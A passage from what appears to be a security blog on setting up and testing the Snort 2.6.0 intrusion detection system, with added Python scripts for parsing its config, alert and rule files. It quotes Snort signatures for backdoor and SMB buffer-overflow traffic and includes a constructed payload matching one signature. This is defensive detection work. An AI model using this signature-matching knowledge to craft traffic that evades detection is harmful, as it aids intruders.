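106 || DELETED BACKDOOR ACKcmdC trojan scan || arachnids,445
108 || BACKDOOR QAZ Worm Client Login access || MCAFEE,98775
1000002 || LOCAL constructed rule present only in the newer map
"""


def parse_sid_msg_map(text):
    """Return {sid: (message, [references])} from sid-msg.map text.

    Each line is 'sid || message || ref || ref ...'. Blank lines and '#'
    comments are skipped, as are lines with no '||' or a non-numeric SID.
    """
    entries = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = [f.strip() for f in line.split("||")]
        if len(fields) < 2 or not fields[0].isdigit():
            continue  # malformed line: no message could be mapped for it
        entries[int(fields[0])] = (fields[1], fields[2:])
    return entries


def compare_maps(old, new):
    """Describe how two parsed maps differ, by SID."""
    old_sids, new_sids = set(old), set(new)
    common = old_sids & new_sids
    return {
        "only_old": sorted(old_sids - new_sids),
        "only_new": sorted(new_sids - old_sids),
        "changed": sorted(s for s in common if old[s][0] != new[s][0]),
        "deleted": sorted(s for s in new if new[s][0].startswith("DELETED")),
    }


def alert_message(entries, sid):
    """The message text an alert for this SID would carry, or None if unmapped."""
    return entries[sid][0] if sid in entries else None


if __name__ == "__main__":
    shipped = parse_sid_msg_map(SNORT_SHIPPED_MAP)
    ruleset = parse_sid_msg_map(RULESET_MAP)
    diff = compare_maps(shipped, ruleset)
    for key, sids in diff.items():
        print(f"{key:9s}: {sids}")
    for sid in diff["changed"]:
        print(f"sid {sid}: '{alert_message(shipped, sid)}' -> '{alert_message(ruleset, sid)}'")
```

Running it against the real /usr/local/etc/snort/sid-msg.map and rules/sid-msg.map (read the two files instead of the embedded strings) shows at a glance which alerts would be labelled with stale text if the Snort-shipped map were left in place.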

I also looked for differences in the snort.conf shipped with Snort and the version shipped with the rules.

orr:/usr/local/etc/snort# diff snort.conf rules/snort.conf
2c2
< # http://www.snort.org Snort 2.6.0 config file
---
> # http://www.snort.org Snort current Ruleset
5c5
< # $Id$
---
> # $Id: snort.conf,v 1.167 2006/06/09 15:14:08 mwatchinski Exp $
111c111
< var RULE_PATH ./rules
---
> var RULE_PATH ../rules
852c852
< include $RULE_PATH/virus.rules
---
> # include $RULE_PATH/virus.rules
855a856
> # include $RULE_PATH/spyware-put.rules

The new file has a different RULE_PATH, pointing to the directory where the snort.conf and rules files reside. The new snort.conf also disables the virus.rules set and the new spyware-put.rules set.
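The RULE_PATH difference above, the commented-out includes from the earlier memory post, and the search-method lowmem setting are all worth checking before a snort.conf goes into service. The Python script below is an added example, not code from Snort or from the original posts: it parses the var, include and config detection lines of a snort.conf, expands $RULE_PATH, resolves relative includes against the directory that holds the config file (which is why ../rules in rules/snort.conf lands back in /usr/local/etc/snort/rules), and reports which rule files are enabled, which are commented out, and which search method is configured. The embedded configuration is constructed for the example and is not either real file.

```python
import posixpath
import re

# Constructed sample in the style of the two snort.conf files compared above.
SAMPLE_SNORT_CONF = """\
# http://www.snort.org Snort current Ruleset
var HOME_NET any
var EXTERNAL_NET any
var RULE_PATH ../rules
config detection: search-method lowmem
include classification.config
include $RULE_PATH/exploit.rules
include $RULE_PATH/web-attacks.rules
# include $RULE_PATH/virus.rules
# include $RULE_PATH/spyware-put.rules
"""

VAR_RE = re.compile(r"^\s*var\s+(\w+)\s+(\S+)")
INCLUDE_RE = re.compile(r"^\s*(#\s*)?include\s+(\S+)")
SEARCH_METHOD_RE = re.compile(r"^\s*config\s+detection\s*:\s*search-method\s+(\S+)")


def expand_vars(value, variables):
    """Replace $NAME references with the values of earlier var lines."""
    return re.sub(r"\$(\w+)", lambda m: variables.get(m.group(1), m.group(0)), value)


def resolve_include(path, conf_dir):
    """Relative includes are resolved against the directory holding snort.conf."""
    if not path.startswith("/"):
        path = posixpath.join(conf_dir, path)
    return posixpath.normpath(path)


def parse_snort_conf(text, conf_dir):
    """Collect variables, enabled/commented includes and the search method."""
    variables = {}
    enabled, disabled = [], []
    search_method = None  # None means Snort's default, i.e. not lowmem
    for line in text.splitlines():
        m = VAR_RE.match(line)
        if m:
            variables[m.group(1)] = expand_vars(m.group(2), variables)
            continue
        m = SEARCH_METHOD_RE.match(line)
        if m:
            search_method = m.group(1)
            continue
        m = INCLUDE_RE.match(line)
        if m:
            target = resolve_include(expand_vars(m.group(2), variables), conf_dir)
            (disabled if m.group(1) else enabled).append(target)
    return {
        "rule_path": resolve_include(variables.get("RULE_PATH", "."), conf_dir),
        "search_method": search_method,
        "enabled": enabled,
        "disabled": disabled,
    }


def summarize(text, conf_dir):
    """Human-readable report of what parse_snort_conf found."""
    info = parse_snort_conf(text, conf_dir)
    lines = [f"RULE_PATH resolves to {info['rule_path']}",
             f"search-method: {info['search_method'] or 'default'}",
             f"{len(info['enabled'])} include(s) enabled, "
             f"{len(info['disabled'])} commented out"]
    lines += [f"  disabled: {p}" for p in info["disabled"]]
    return "\n".join(lines)


if __name__ == "__main__":
    # conf_dir is where rules/snort.conf lives in the walkthrough above.
    print(summarize(SAMPLE_SNORT_CONF, "/usr/local/etc/snort/rules"))
```

Pointing it at a real file (read the text and pass the config's directory as conf_dir) is a quick way to confirm that every enabled include actually exists on disk before running snort -T.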

With these changes in mind, I ran Snort in test mode using the -T switch.

orr:/usr/local/etc/snort# snort -T -c rules/snort.conf
Running in Test mode with config file: rules/snort.conf
Running in IDS mode

--== Initializing Snort ==--
Initializing Output Plugins!
Initializing Preprocessors!
Initializing Plug-ins!
Parsing Rules file rules/snort.conf

+++++++++++++++++++++++++++++++++++++++++++++++++++
Initializing rule chains...
Var 'EXTERNAL_NET' defined, value len = 3 chars, value = any
Var 'DNS_SERVERS' defined, value len = 3 chars, value = any
Var 'SMTP_SERVERS' defined, value len = 3 chars, value = any
Var 'HTTP_SERVERS' defined, value len = 3 chars, value = any
Var 'SQL_SERVERS' defined, value len = 3 chars, value = any
Var 'TELNET_SERVERS' defined, value len = 3 chars, value = any
Var 'SNMP_SERVERS' defined, value len = 3 chars, value = any
Var 'HTTP_PORTS' defined, value len = 2 chars, value = 80
Var 'SHELLCODE_PORTS' defined, value len = 3 chars, value = !80
Var 'ORACLE_PORTS' defined, value len = 4 chars, value = 1521
Var 'AIM_SERVERS' defined, value len = 185 chars
[64.12.24.0/23,64.12.28.0/23,64.12.161.0/24,64.12.163.0/24,64.12.200.0/24,
205.188.3.0/24,205.188.5.0/24,205.188.7.0/24,205.188.9.0/24,
205.188.153.0/24,205.188.179.0/24,205.188.248.0/24]
Var 'RULE_PATH' defined, value len = 8 chars, value = ../rules
,-----------[Flow Config]----------------------
| Stats Interval: 0
| Hash Method: 2
| Memcap: 10485760
| Rows : 4099
| Overhead Bytes: 16400(%0.16)
`----------------------------------------------
Frag3 global config:
Max frags: 65536
Fragment memory cap: 4194304 bytes
Frag3 engine config:
Target-based policy: FIRST
Fragment timeout: 60 seconds
Fragment min_ttl: 1
Fragment ttl_limit: 5
Fragment Problems: 1
Bound Addresses: 0.0.0.0/0.0.0.0
Stream4 config:
Stateful inspection: ACTIVE
Session statistics: INACTIVE
Session timeout: 30 seconds
Session memory cap: 8388608 bytes
Session count max: 8192 sessions
Session cleanup count: 5
State alerts: INACTIVE
Evasion alerts: INACTIVE
Scan alerts: INACTIVE
Log Flushed Streams: INACTIVE
MinTTL: 1
TTL Limit: 5
Async Link: 0
State Protection: 0
Self preservation threshold: 50
Self preservation period: 90
Suspend threshold: 200
Suspend period: 30
Enforce TCP State: INACTIVE
Midstream Drop Alerts: INACTIVE
Server Data Inspection Limit: -1
WARNING rules/snort.conf(408) => flush_behavior set in config file, using old static flushpoints (0)
Stream4_reassemble config:
Server reassembly: INACTIVE
Client reassembly: ACTIVE
Reassembler alerts: ACTIVE
Zero out flushed packets: INACTIVE
Flush stream on alert: INACTIVE
flush_data_diff_size: 500
Reassembler Packet Preferance : Favor Old
Packet Sequence Overlap Limit: -1
Flush behavior: Small (<255 bytes)
Ports: 21 23 25 42 53 80 110 111 135 136 137 139 143 445 513 1433 1521 3306
Emergency Ports: 21 23 25 42 53 80 110 111 135 136 137 139 143 445 513 1433 1521 3306
HttpInspect Config:
GLOBAL CONFIG
Max Pipeline Requests: 0
Inspection Type: STATELESS
Detect Proxy Usage: NO
IIS Unicode Map Filename: rules/unicode.map
IIS Unicode Map Codepage: 1252
DEFAULT SERVER CONFIG:
Ports: 80 8080 8180
Flow Depth: 300
Max Chunk Length: 500000
Inspect Pipeline Requests: YES
URI Discovery Strict Mode: NO
Allow Proxy Usage: NO
Disable Alerting: NO
Oversize Dir Length: 500
Only inspect URI: NO
Ascii: YES alert: NO
Double Decoding: YES alert: YES
%U Encoding: YES alert: YES
Bare Byte: YES alert: YES
Base36: OFF
UTF 8: OFF
IIS Unicode: YES alert: YES
Multiple Slash: YES alert: NO
IIS Backslash: YES alert: NO
Directory Traversal: YES alert: NO
Web Root Traversal: YES alert: YES
Apache WhiteSpace: YES alert: NO
IIS Delimiter: YES alert: NO
IIS Unicode Map: GLOBAL IIS UNICODE MAP CONFIG
Non-RFC Compliant Characters: NONE
rpc_decode arguments:
Ports to decode RPC on: 111 32771
alert_fragments: INACTIVE
alert_large_fragments: ACTIVE
alert_incomplete: ACTIVE
alert_multiple_requests: ACTIVE
Portscan Detection Config:
Detect Protocols: TCP UDP ICMP IP
Detect Scan Type: portscan portsweep decoy_portscan distributed_portscan
Sensitivity Level: Low
Memcap (in bytes): 10000000
Number of Nodes: 36900

4655 Snort rules read...
4655 Option Chains linked into 206 Chain Headers
0 Dynamic rules
+++++++++++++++++++++++++++++++++++++++++++++++++++

Tagged Packet Limit: 256

+-----------------------[thresholding-config]----------------------------------
| memory-cap : 1048576 bytes
+-----------------------[thresholding-global]----------------------------------
| none
+-----------------------[thresholding-local]-----------------------------------
| gen-id=1 sig-id=3543 type=Threshold tracking=src count=5 seconds=2
| gen-id=1 sig-id=3527 type=Limit tracking=dst count=5 seconds=60
| gen-id=1 sig-id=3152 type=Threshold tracking=src count=5 seconds=2
| gen-id=1 sig-id=3273 type=Threshold tracking=src count=5 seconds=2
| gen-id=1 sig-id=2275 type=Threshold tracking=dst count=5 seconds=60
| gen-id=1 sig-id=2523 type=Both tracking=dst count=10 seconds=10
| gen-id=1 sig-id=3542 type=Threshold tracking=src count=5 seconds=2
| gen-id=1 sig-id=4984 type=Threshold tracking=src count=5 seconds=2
| gen-id=1 sig-id=2923 type=Threshold tracking=dst count=10 seconds=60
| gen-id=1 sig-id=2924 type=Threshold tracking=dst count=10 seconds=60
+-----------------------[suppression]------------------------------------------
| none
-------------------------------------------------------------------------------
Rule application order: ->activation->dynamic->pass->drop->alert->log
Log directory = /var/log/snort
Loading dynamic engine /usr/local/lib/snort_dynamicengine/libsf_engine.so... done
Loading all dynamic preprocessor libs from /usr/local/lib/snort_dynamicpreprocessor/...
Loading dynamic preprocessor library
/usr/local/lib/snort_dynamicpreprocessor//libsf_ftptelnet_preproc.so... done
Loading dynamic preprocessor library
/usr/local/lib/snort_dynamicpreprocessor//libsf_smtp_preproc.so... done
Finished Loading all dynamic preprocessor libs from /usr/local/lib/snort_dynamicpreprocessor/
FTPTelnet Config:
GLOBAL CONFIG
Inspection Type: stateful
Check for Encrypted Traffic: YES alert: YES
Continue to check encrypted data: NO
TELNET CONFIG:
Ports: 23
Are You There Threshold: 200
Normalize: YES
FTP CONFIG:
FTP Server: default
Ports: 21
Check for Telnet Cmds: YES alert: YES
Identify open data channels: YES
FTP Client: default
Check for Bounce Attacks: YES alert: YES
Check for Telnet Cmds: YES alert: YES
Max Response Length: 256
SMTP Config:
Ports: 25
Inspection Type: STATEFUL
Normalize Spaces: YES
Ignore Data: NO
Ignore TLS Data: NO
Ignore Alerts: NO
Max Command Length: 0
Max Header Line Length: 0
Max Response Line Length: 0
X-Link2State Alert: YES
Drop on X-Link2State Alert: NO
Verifying Preprocessor Configurations!
Warning: flowbits key 'realplayer.playlist' is checked but not ever set.
Warning: flowbits key 'ms_sql_seen_dns' is checked but not ever set.
Warning: flowbits key 'dce.isystemactivator.bind.call.attempt' is set but not ever checked.
Warning: flowbits key 'dce.bind.veritas' is set but not ever checked.
Warning: flowbits key 'http.jpeg' is checked but not ever set.
Decoding LoopBack on interface NULL

--== Initialization Complete ==--

,,_ -*> Snort! <*-
o" )~ Version 2.6.0 (Build 59) FreeBSD
'''' By Martin Roesch & The Snort Team: http://www.snort.org/team.html
(C) Copyright 1998-2006 Sourcefire Inc., et al.

Rules Engine: SF_SNORT_DETECTION_ENGINE Version 1.5
Preprocessor Object: SF_SMTP Version 1.0
Preprocessor Object: SF_FTPTELNET Version 1.0

Snort sucessfully loaded all rules and checked all rule chains!
Frag3 statistics:
Total Fragments: 0
Frags Reassembled: 0
Discards: 0
Memory Faults: 0
Timeouts: 0
Overlaps: 0
Anomalies: 0
Alerts: 0
FragTrackers Added: 0
FragTrackers Dumped: 0
FragTrackers Auto Freed: 0
Frag Nodes Inserted: 0
Frag Nodes Deleted: 0
===============================================================================
Final Flow Statistics
,----[ FLOWCACHE STATS ]----------
Memcap: 10485760 Overhead Bytes 16400 used(%0.156403)/blocks (16400/1)
Overhead blocks: 1 Could Hold: (0)
IPV4 count: 0 frees: 0
low_time: 0, high_time: 0, diff: 0h:00:00s
finds: 0 reversed: 0(%0.000000)
find_success: 0 find_fail: 0
percent_success: (%0.000000) new_flows: 0
Snort exiting

That looked fine as well. At this point I was ready to see whether Snort would detect a simple activity it considers an attack. I always recommend running Snort like this before installing Sguil, BASE, or any other product. Get Snort to work in its simplest mode first -- write pcap data to a snort.log.TIMESTAMP file and alerts to an alert text file.

orr:/usr/local/etc/snort# snort -i ndis0 -c rules/snort.conf -l .

I then connected via netcat to port 22 TCP on a system Snort would see, and typed the string GOBBLES.

orr:/home/richard$ nc -v 192.168.2.12 22
Connection to 192.168.2.12 22 port [tcp/ssh] succeeded!
SSH-2.0-OpenSSH_3.8.1p1 Debian-8.sarge.4
GOBBLES
Protocol mismatch.

Sure enough, Snort provided the following alert.

orr:/usr/local/etc/snort# cat alert
[**] [1:1812:6] EXPLOIT gobbles SSH exploit attempt [**]
[Classification: Misc Attack] [Priority: 2]
08/04-10:32:58.288723 192.168.2.5:61827 -> 192.168.2.12:22
TCP TTL:64 TOS:0x0 ID:8266 IpLen:20 DgmLen:60 DF
***AP*** Seq: 0x501CCD3D Ack: 0x80C794DE Win: 0x8218 TcpLen: 32
TCP Options (3) => NOP NOP TS: 3931737 3840029448
[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0639][Xref =>
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0390][Xref =>
http://cve.mitre.org/cgi-bin/cvename.cgi?name=11031][Xref =>
http://www.securityfocus.com/bid/5093]

It also logged the offending packet.

orr:/usr/local/etc/snort# tcpdump -n -r snort.log.1154701968 -X
reading from file snort.log.1154701968, link-type EN10MB (Ethernet)
10:32:58.288723 IP 192.168.2.5.61827 > 192.168.2.12.22:
P 1344064829:1344064837(8) ack 2160563422 win 33304
0x0000: 4500 003c 204a 4000 4006 9510 c0a8 0205 E..<.J@.@.......
0x0010: c0a8 020c f183 0016 501c cd3d 80c7 94de ........P..=....
0x0020: 8018 8218 0b38 0000 0101 080a 003b fe59 .....8.......;.Y
0x0030: e4e2 3308 474f 4242 4c45 530a ..3.GOBBLES.

This verifies Snort is working properly.
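
The alert file above is the simplest Snort output to start with, and it is also easy to parse. The following script is an added example, written for this page and not part of the post or of Snort: it reads Snort's full-alert text format into records (gid/sid/rev, message, classification, priority, endpoints, protocol, TTL, cross-references) and tallies them by signature, which is the first thing to look at when tuning. The sample input is constructed from the gobbles alert shown above, with the Xref entries on one line as Snort writes them, plus a made-up ICMP record with no ports so the endpoint pattern's port-less branch is exercised too.

```python
import re
from collections import Counter
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample: record 1 is the gobbles alert from above, with its Xref
# entries on one line as Snort writes them; record 2 is a made-up ICMP alert
# (no ports) to exercise that branch of the endpoint pattern.
SAMPLE_ALERT_FILE = """\
[**] [1:1812:6] EXPLOIT gobbles SSH exploit attempt [**]
[Classification: Misc Attack] [Priority: 2]
08/04-10:32:58.288723 192.168.2.5:61827 -> 192.168.2.12:22
TCP TTL:64 TOS:0x0 ID:8266 IpLen:20 DgmLen:60 DF
***AP*** Seq: 0x501CCD3D Ack: 0x80C794DE Win: 0x8218 TcpLen: 32
TCP Options (3) => NOP NOP TS: 3931737 3840029448
[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0639][Xref => http://www.securityfocus.com/bid/5093]

[**] [1:408:5] ICMP Echo Reply [**]
[Classification: Misc activity] [Priority: 3]
08/04-10:33:01.000000 192.168.2.12 -> 192.168.2.5
ICMP TTL:64 TOS:0x0 ID:12 IpLen:20 DgmLen:84
Type:0 Code:0 ID:1 Seq:1 ECHO REPLY
"""

HEADER_RE = re.compile(r'^\[\*\*\] \[(\d+):(\d+):(\d+)\] (.+?) \[\*\*\]$')
CLASS_RE = re.compile(r'^(?:\[Classification: (.+?)\] )?\[Priority: (\d+)\]')
FLOW_RE = re.compile(r'^(\d\d/\d\d-\d\d:\d\d:\d\d\.\d+) (\S+?)(?::(\d+))? -> (\S+?)(?::(\d+))?$')
PROTO_RE = re.compile(r'^(TCP|UDP|ICMP|IP) TTL:(\d+)')
XREF_RE = re.compile(r'\[Xref => ([^\]]+)\]')


@dataclass
class Alert:
    gid: int
    sid: int
    rev: int
    msg: str
    classification: Optional[str] = None
    priority: Optional[int] = None
    timestamp: str = ''
    src: str = ''
    sport: Optional[int] = None     # None for port-less protocols such as ICMP
    dst: str = ''
    dport: Optional[int] = None
    proto: str = ''
    ttl: Optional[int] = None
    xrefs: List[str] = field(default_factory=list)


def parse_alert_file(text: str) -> List[Alert]:
    """Split the file into blank-line-separated records and parse each one."""
    alerts = []
    for block in re.split(r'\n\s*\n', text.strip()):
        lines = block.splitlines()
        m = HEADER_RE.match(lines[0])
        if not m:
            continue                 # not an alert header: skip rather than crash
        a = Alert(int(m.group(1)), int(m.group(2)), int(m.group(3)), m.group(4))
        for line in lines[1:]:
            if (m := CLASS_RE.match(line)):
                a.classification, a.priority = m.group(1), int(m.group(2))
            elif (m := FLOW_RE.match(line)):
                a.timestamp, a.src, a.dst = m.group(1), m.group(2), m.group(4)
                a.sport = int(m.group(3)) if m.group(3) else None
                a.dport = int(m.group(5)) if m.group(5) else None
            elif (m := PROTO_RE.match(line)):
                a.proto, a.ttl = m.group(1), int(m.group(2))
            elif line.startswith('[Xref'):
                a.xrefs.extend(XREF_RE.findall(line))
        alerts.append(a)
    return alerts


def count_by_signature(alerts: List[Alert]) -> Counter:
    """Tally alerts per (gid, sid); the noisiest signatures are tuning candidates."""
    return Counter((a.gid, a.sid) for a in alerts)


if __name__ == '__main__':
    parsed = parse_alert_file(SAMPLE_ALERT_FILE)
    for a in parsed:
        print(f'{a.timestamp} [{a.gid}:{a.sid}:{a.rev}] {a.proto} '
              f'{a.src}:{a.sport} -> {a.dst}:{a.dport}  {a.msg}  (prio {a.priority})')
    print(count_by_signature(parsed))
```

Pointing `parse_alert_file` at the real file (`open('/var/log/snort/alert').read()`) gives the same records; everything is keyed on the `[**] [gid:sid:rev]` header line, so the occasional extra line Snort adds for other protocols is simply skipped.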

While Snort was running I checked its memory usage.

20329 root 1 -58 0 227M 226M bpf 0:05 21.38% snort

227 MB is much greater than my experience with Snort 2.4.x, where around 63 MB was the norm.

73920 sguil 1 -58 0 63772K 63000K bpf 10:26 0.00% snort

Looking in the snort.conf file, I enabled the following option to reduce memory usage.

config detection: search-method lowmem

When I re-ran Snort, memory usage dropped to about 37 MB.

20334 root 1 -58 0 37480K 36656K bpf 0:02 20.06% snort

Keep in mind that Snort will perform less well when given lower memory. On higher bandwidth links it will drop packets.

For information on how to now tune your Snort installation, I recommend reading my newest article Tuning Snort in the August 2006 Sys Admin magazine.

Tuesday, 02 May 2006

Snort Dynamic Rules Preview

On my flights to and from the GFIRST 2006 conference this week, I got a chance to read the manual for Snort 2.6.0RC1. The most obvious addition to Snort 2.6 is the ability to add preprocessors, detection capabilities, and rules as dynamically loadable modules. This feature is activated by running configure with the --enable-dynamicplugin switch. Preprocessors and detection capabilities are more of an issue for Snort developers, since few Snort users code their own features. The advantage of the dynamic engine is that developers can write their own modules without having to patch Snort itself.

Most Snort users customize Snort by writing their own rules. Beginning with Snort 2.6.0RC1, the new C-style rule language is in place. If you read the snort_manual.pdf included with snort-2.6.0RC1.tar.gz, you will see a discussion of the new format starting in section 5.1.5 (Dynamic Rules). Here is an example of a rule in the old format:

alert tcp $HOME_NET 12345:12346 -> $EXTERNAL_NET any (msg:"BACKDOOR netbus active";
flow:from_server,established; content:"NetBus"; reference:arachnids,401;
classtype:misc-activity; sid:109; rev:5;)

Here is the same rule in the new format. You can find it as sid109.c in the /src/snort-2.6.0RC1/src/dynamic-examples/dynamic-rule directory. It looks like this:

/*
 * sid109.c
 *
 * Copyright (C) 2006 Sourcefire,Inc
 * Steven A. Sturges
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
 *
 * Description:
 *
 * This file is part of an example of a dynamically loadable rules library.
 *
 * NOTES:
 *
 */

#include "sf_snort_plugin_api.h"
#include "sf_snort_packet.h"
#include "detection_lib_meta.h"

/*
 * C-language example for SID 109
 *
 * alert tcp $HOME_NET 12345:12346 -> $EXTERNAL_NET any
 * (msg:"BACKDOOR netbus active"; flow:from_server,established;
 * content:"NetBus"; reference:arachnids,401; classtype:misc-activity;
 * sid:109; rev:5;)
 *
 */

/* flow:established, from_server; */
static FlowFlags sid109flow =
{
    FLOW_ESTABLISHED|FLOW_TO_CLIENT
};

static RuleOption sid109option1 =
{
    OPTION_TYPE_FLOWFLAGS,
    {
        &sid109flow
    }
};

/* content:"NetBus"; */
static ContentInfo sid109content =
{
    "NetBus",                   /* pattern to search for */
    0,                          /* depth */
    0,                          /* offset */
    CONTENT_BUF_NORMALIZED,     /* flags */
    NULL,                       /* holder for boyer/moore info */
    NULL,                       /* holder for byte representation of "NetBus" */
    0,                          /* holder for length of byte representation */
    0                           /* holder of increment length */
};

static RuleOption sid109option2 =
{
    OPTION_TYPE_CONTENT,
    {
        &sid109content
    }
};

/* references for sid 109 */
static RuleReference sid109ref_arachnids =
{
    "arachnids",    /* Type */
    "401"           /* value */
};

static RuleReference *sid109refs[] =
{
    &sid109ref_arachnids,
    NULL
};

RuleOption *sid109options[] =
{
    &sid109option1,
    &sid109option2,
    NULL
};

Rule sid109 =
{
    /* protocol header, akin to => tcp any any -> any any */
    {
        IPPROTO_TCP,        /* proto */
        HOME_NET,           /* source IP */
        "12345:12346",      /* source port(s) */
        0,                  /* direction, uni-directional */
        EXTERNAL_NET,       /* destination IP */
        ANY_PORT            /* destination port(s) */
    },
    /* metadata */
    {
        3,                          /* genid -- use 3 to distinguish a C rule */
        109,                        /* sigid */
        5,                          /* revision */
        "misc-activity",            /* classification */
        0,                          /* priority */
        "BACKDOOR netbus active",   /* message */
        sid109refs                  /* ptr to references */
    },
    sid109options,  /* ptr to rule options */
    NULL,           /* Use internal eval func */
    0,              /* Holder, not yet initialized, used internally */
    0,              /* Holder, option count, used internally */
    0,              /* Holder, no alert used internally for flowbits */
    NULL            /* Holder, rule data, used internally */
};

For an explanation of this rule, please see the snort_manual.pdf packaged with Snort 2.6.0RC1. It is not yet online.

For a simple rule like sid 109, the new structure looks very "heavy." However, consider a rule like the following, sid 2258:

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"NETBIOS SMB-DS DCERPC Messenger Service
buffer overflow attempt"; flow:to_server,established; content:"|FF|SMB%"; depth:5; offset:4;
nocase; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00|";
within:12; distance:5; nocase; content:"|04 00|"; within:2; byte_test:1,>,15,2,relative;
byte_jump:4,86,little,align,relative; byte_jump:4,8,little,align,relative;
byte_test:4,>,1024,0,little,relative; reference:bugtraq,8826; reference:cve,2003-0717;
reference:nessus,11888; reference:nessus,11890;
reference:url,www.microsoft.com/technet/security/bulletin/MS03-043.mspx;
classtype:attempted-admin; sid:2258; rev:9;)

That rule demonstrates the difficulty of writing more complex rules. The new rules structure should make writing rules like sid 2258 easier.
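
To see what the content modifiers in sid 2258 actually do, here is an added Python example (written for this page; it is not code from the post, from the Snort manual or from Snort itself). It parses both rules quoted above into header fields, ordered options and a list of content patterns, then evaluates the content chain against a payload the way the text rule language describes it: offset/depth are absolute positions, distance/within are measured from the end of the previous match, nocase folds ASCII case, and |..| hex escapes become bytes. The byte_test/byte_jump options are parsed but not evaluated, and the SMB payload is constructed so that each content of sid 2258 lands exactly where the rule requires.

```python
import re
from dataclasses import dataclass

# The two rules quoted in the post, joined onto single lines.
RULE_109 = ('alert tcp $HOME_NET 12345:12346 -> $EXTERNAL_NET any '
            '(msg:"BACKDOOR netbus active"; flow:from_server,established; '
            'content:"NetBus"; reference:arachnids,401; classtype:misc-activity; '
            'sid:109; rev:5;)')
RULE_2258 = (
    'alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"NETBIOS SMB-DS DCERPC '
    'Messenger Service buffer overflow attempt"; flow:to_server,established; '
    'content:"|FF|SMB%"; depth:5; offset:4; nocase; content:"&|00|"; within:2; '
    'distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00|"; within:12; '
    'distance:5; nocase; content:"|04 00|"; within:2; byte_test:1,>,15,2,relative; '
    'byte_jump:4,86,little,align,relative; byte_jump:4,8,little,align,relative; '
    'byte_test:4,>,1024,0,little,relative; reference:bugtraq,8826; '
    'reference:cve,2003-0717; reference:nessus,11888; reference:nessus,11890; '
    'reference:url,www.microsoft.com/technet/security/bulletin/MS03-043.mspx; '
    'classtype:attempted-admin; sid:2258; rev:9;)')


@dataclass
class Rule:
    action: str
    proto: str
    src: str
    sport: str
    direction: str
    dst: str
    dport: str
    options: list    # (name, value) pairs in rule order
    contents: list   # one dict per content, carrying its own modifiers

    def option(self, name):
        return next((v for n, v in self.options if n == name), None)

    @property
    def sid(self) -> int:
        return int(self.option('sid'))


def decode_content(text: str) -> bytes:
    """'ab|FF 00|cd' -> bytes: text outside |..| is literal, inside is hex."""
    out = bytearray()
    for i, part in enumerate(text.split('|')):
        out += bytes.fromhex(part) if i % 2 else part.encode('latin-1')
    return bytes(out)


def parse_rule(text: str) -> Rule:
    head, _, body = text.strip().partition('(')   # assumes no '(' before the options
    action, proto, src, sport, direction, dst, dport = head.split()
    options, contents = [], []
    # split on ';' outside double quotes; the trailing ')' is stripped first
    for opt in filter(str.strip, re.findall(r'(?:"[^"]*"|[^;"])+', body.rstrip(') '))):
        name, _, value = opt.strip().partition(':')
        name, value = name.strip(), value.strip().strip('"')
        options.append((name, value))
        if name == 'content':
            contents.append({'pattern': decode_content(value), 'offset': 0, 'depth': None,
                             'distance': None, 'within': None, 'nocase': False})
        elif contents and name in ('offset', 'depth', 'distance', 'within'):
            contents[-1][name] = int(value)   # modifiers bind to the preceding content
        elif contents and name == 'nocase':
            contents[-1]['nocase'] = True
    return Rule(action, proto, src, sport, direction, dst, dport, options, contents)


def match_contents(rule: Rule, payload: bytes) -> bool:
    """Evaluate the rule's content chain (not byte_test/byte_jump) against a payload."""
    cursor = 0                                   # end of the previous match
    for c in rule.contents:
        hay, pat = payload, c['pattern']
        if c['nocase']:
            hay, pat = hay.lower(), pat.lower()  # ASCII-only case folding
        if c['distance'] is not None or c['within'] is not None:
            start = max(0, cursor + (c['distance'] or 0))      # relative to last match
            end = start + c['within'] if c['within'] is not None else len(hay)
        else:
            start = c['offset']                                 # absolute from payload start
            end = start + c['depth'] if c['depth'] is not None else len(hay)
        idx = hay.find(pat, start, end)          # match must lie wholly inside [start, end)
        if idx < 0:
            return False
        cursor = idx + len(pat)
    return True


# Constructed payload laid out so each content of sid 2258 lands exactly where
# the rule's offset/distance values require it.
SMB_PAYLOAD = (b'\x00\x00\x00\x00'                     # 4-byte NetBIOS session header
               + b'\xffSMB%'                           # offset:4 depth:5
               + b'A' * 56                             # distance:56 from the end of "\xffSMB%"
               + b'&\x00'                              # within:2
               + b'B' * 5                              # distance:5
               + b'\\\x00P\x00I\x00P\x00E\x00\\\x00'   # within:12, nocase
               + b'\x04\x00'                           # within:2, right after the pipe name
               + b'C' * 8)

if __name__ == '__main__':
    for rule in (parse_rule(RULE_109), parse_rule(RULE_2258)):
        print(rule.sid, rule.option('msg'), len(rule.contents), 'content(s)')
    print('sid 2258 chain on constructed payload:', match_contents(parse_rule(RULE_2258), SMB_PAYLOAD))
```

Shifting the filler by a single byte (`b'A' * 57`) makes the second content miss its two-byte window and the whole chain fails, which is the point of within/distance: they pin each pattern to a position derived from the previous match rather than letting it float anywhere in the payload.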

The sid109.c example shown above, and the material in the snort_manual.pdf packaged with Snort 2.6.0RC1, may not be exactly what ships with Snort 2.6.0 or even Snort 3.0.0. Sourcefire has not determined whether it will completely replace the old style rule format in favor of the new format. I expect to see Snort 3.0.0 ship with rules in the new format.

Friday, 24 March 2006

Check Point Acquisition of Sourcefire Cancelled

According to Sourcefire's press release:

